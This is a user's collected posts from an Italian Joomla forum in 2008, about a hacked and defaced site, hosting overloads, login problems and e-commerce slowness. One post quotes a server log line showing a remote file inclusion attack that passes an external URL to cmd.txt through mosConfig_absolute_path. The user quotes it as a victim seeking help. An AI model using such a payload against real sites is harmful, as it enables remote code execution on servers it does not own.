Post

1

Sicurezza / Sito hackerato dai turchi

« il: 09 Ott 2008, 15:54:46 »

Stamattina mi sono trovato il sito hackerato da un gruppo di rompicoglioni turchi...praticamente come ho letto altrove hanno sostituito le index.html con le loro...
Ci ho messo mezza giornata a ripristinare tutto, ho letto qui però di gente che ha subito anche 6 attacchi!!! :ooo

Io ho Joomla 1.0.15 (l'ultima praticamente su 1.0.x)
Lo so che dovrei uppare alla 1.5.x però mi salterebbe tutto la grafica e al momento non ho tempo di lavorarci dietro (ho un e-commerce con un migliaio di articoli). Ho letto qui piuttosto di gente hackerata anche con la 1.5.x....quindi la vulnerabilità resta?!

Alcune domande:
1) Cambiare la pass di amministrazione del server o di Joomla?
2) Avevo i chmod su tutto il sito a 777, ora li ho messi a 775. Ho fatto bene o male e può servire?
3) Ho controllato i componenti con falle...ho aggiornato alle ultime versioni disponibili, non basta?

Grazie

2

Gestione e-commerce / Re: micropagamenti: idee e soluzioni

« il: 30 Mar 2008, 22:16:20 »

Ci sono servizi appositi per i micropagamenti del tipo:
cliente tel o manda 1 sms al numero XXXXX al costo di 5 euro (esempio) metà li prendi te e metà il gestore che rivende tale servizio. L'implementazione su VM però è tutta da vedere.

Paypal si prende il 3,4% + 0,35 euro/cents per cui su cifre tanto basse la % di commissioni è alquanto altina (non per la % ma per la base fissa di 0,35 che incide parecchio). C'è però da dire che il sistema paypal dalla sua è completo, rapido, conosciuto e ti permette di far pagare con Postepay e carte di credito anche se lutente non ha Paypal

3

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Subisco attacchi di spam o altro

« il: 19 Mar 2008, 18:02:18 »

Ho dovuto disinstallare i componenti Facileforms e Fireboard per un massiccio attacco di spam che creava casini al server

4

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Subisco attacchi di spam o altro

« il: 18 Mar 2008, 17:21:30 »

E' già la seconda volta che mi capita che l'hoster mi mette offline il sito poichè subisco centinaia di chiamate come questa:

80.68.203.22 - - [14/Mar/2008:16:41:43 +0100]
"GET /component/option,com_fireboard/Itemid,46/func,post/do,quote/replyto,29//index.php?option=com_virtuemart&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 406 421 "-" "libwww-perl/5.803"

ora leggendo fireboard ho disinstallato il forum; poi ho aggiornato Joomla alla 1.0.15 (ero alle 1.0.13), ho aggiornato virtuemart alla 1.0.15 (ero alla 1.0.10)
Che razza di attacco è? L'hoster mi ha detto che provocava forti rallentamenti a tutti i siti sul mio stesso server.

5

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 17 Mar 2008, 19:57:33 »

Ho appena fatto upgrade alla Virtuemart 1.0.15
Consigliate l'aggiornamento a Joomla 1.0.15 con questa versione di Virtuemart?

6

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 17 Mar 2008, 15:14:02 »

Si oggi è di nuovo online...grazie
E' sempre l'hoster

7

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 16 Mar 2008, 20:56:26 »

Ragazzi sono incazzato come una pantera. Sono stato via il weekend, accendo il pc vado a vedere il sito e... non trovo nulla!
Pagina bianca di errore. Provo a scaricare la posta dalle caselle @miosito e niente, mi da errore...provo a entrare nel pannello di gestione del mio sito su pagina protetto https e niente, errore di pagina anche qui
Che azzo è successo?
Questo il sito www.editrice-esculapio.it

Provo a entrare via ftp e niente, mi da errore di connessione al server
 

8

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 14 Mar 2008, 15:29:06 »

Penso fosse un problema di server, ieri in coincidenza del mio problema c'era stato un blackout di un paio d'ore

9

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 14 Mar 2008, 09:08:45 »

Stamattina ho riprovato e sono riuscito a entrare
 

10

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 13 Mar 2008, 22:51:55 »

Si figuro ancora superadmin
Non mi da errori. Quando provo a fare login mi ricarica la pagina e mi dice appunto di loggarmi per entrare

11

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: Problema login administrator: non entro più

« il: 13 Mar 2008, 21:40:39 »

Sono alla versione 1.13 stable,ce l'ho da 6 mesi e non ho mai avuto problemi.
Non mi da errori, mi dice che devo loggarmi per entrare. Ha iniziato a farmelo da 3 ore a questa parte

12

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Problema login administrator: non entro più

« il: 13 Mar 2008, 21:28:44 »

Lato front-end riesco a entrare normalmente
Lato back-end non entro più, dice che devo loggarmi per entrare
E' successo tutto a un tratto senza che io cambiassi niente

Cosa può essere?

13

Gestione e-commerce / Lentezza abominevole nell'apertura categorie

« il: 25 Feb 2008, 15:54:35 »

Segnalo una lentezza paurosa che termina nel timeout di richiesta al db quando, loggato con il mio account admin, cerco di aprire le categorie di prodotti più affollate (350 articoli ad esempio).
Se non sono loggato funziona tutto bene, quando invece sono loggato col mio account admin si impala tutto.

Lo stesso problema me lo dava con il modulo ricerca, ma qui ho bypassato installando il bridge con la ricerca di Joomla.

Cosa può essere?
 

14

Sezione dedicata ai Server / Re: Sovraccarico server sito messo offline

« il: 23 Feb 2008, 14:00:32 »

Secondo te anche il modulo promozioni ha lo stesso problema?
Io ho 15 articoli classificati in promozione, quelli visibili nella pagina sono 2 per cui c'è un meccanismo random pure qui

15

Sezione dedicata ai Server / Re: Sovraccarico server sito messo offline

« il: 23 Feb 2008, 13:41:57 »

Ora ho disattivato il modulo random e ho rimesso online il sito.
Ho anche attivo il modulo dei prodotti in promozione...questo però l'ho sempre avuto come quello delle novità.
Un modulo che in passato mi ha creato casini, è quello per vedere lo status messenger dell'admin
Ho dovuto levarlo perchè partivano troppe query al db

16

Sezione dedicata ai Server / Re: Sovraccarico server sito messo offline

« il: 23 Feb 2008, 13:22:40 »

sicuramente il problema e in un modulo di virtuemart prova a disintallarli uno x volta e provi io o avuto lo stesso problema con lo shopping a me dava errore 500 ciucciava oltre 25 mb di memoria era un modulo di virtuemart
ti consiglio di aggiornare entrambe le versioni

Da poco tempo (3 settimane) ho messo online il modulo di virtuemart dei prodotti random e il modulo separato per la ricerca articolo.
Per il secondo non credo che possa consumare memoria, il primo invece forse...generando ad ogni pagina 4 richieste per far comparire il prodotto random

17

Sezione dedicata ai Server / Re: Sovraccarico server sito messo offline

« il: 23 Feb 2008, 13:17:46 »

Ma io non credo sia un bug reale. Ho la versione stabile 1.0.13, poi ripeto mai un problema da settembre 2006 a oggi
La banda invece è messa così:
Traffico visualizzato: 18,02 gb su 20 disponibili
Traffico non visualizzato: 22,68gb

Non so cosa voglia dire traffico non visualizzato

18

Sezione dedicata ai Server / Re: Sovraccarico server sito messo offline

« il: 23 Feb 2008, 11:52:28 »

Il sito con il setting attuale è online da settembre 2007.
Pure secondo quello che me l'ha fatto è una cazzata, tra l'altro mettere offline un sito senza avvertire prima il proprietario? Ma che razza di comportamento è?
Sto infatti valutando di trasferirlo su altro host

19

Sezione dedicata ai Server / Sovraccarico server sito messo offline

« il: 23 Feb 2008, 11:23:13 »

Ciao a tutti
Mi è appena arrivata una notizia agghiacciante.

Gestisco il sito dell'azienda in cui lavoro. Ho implementato Joomla insieme al componenete Virtuemart per la gestione del nostro e-commerce (vendiamo libri)

Stamattina il nostro sito risulta offline www.editrice-esculapio.it
Chiedo informazioni all'host (Olimont-Alicom) e mi viene detto che è presente un bug di programmazione php che causa parecchi problemi agli altri siti hostati sullo stesso server (Linux), così per problemi di sovraccarico mi hanno messo momentaneamente offline dicendomi che non appena avessi individuato il problema, di comunicarlo che mi avrebbero rimesso online.

Io sinceramente non so dove mettere le mani. E dove lo vado a cercare questo bug?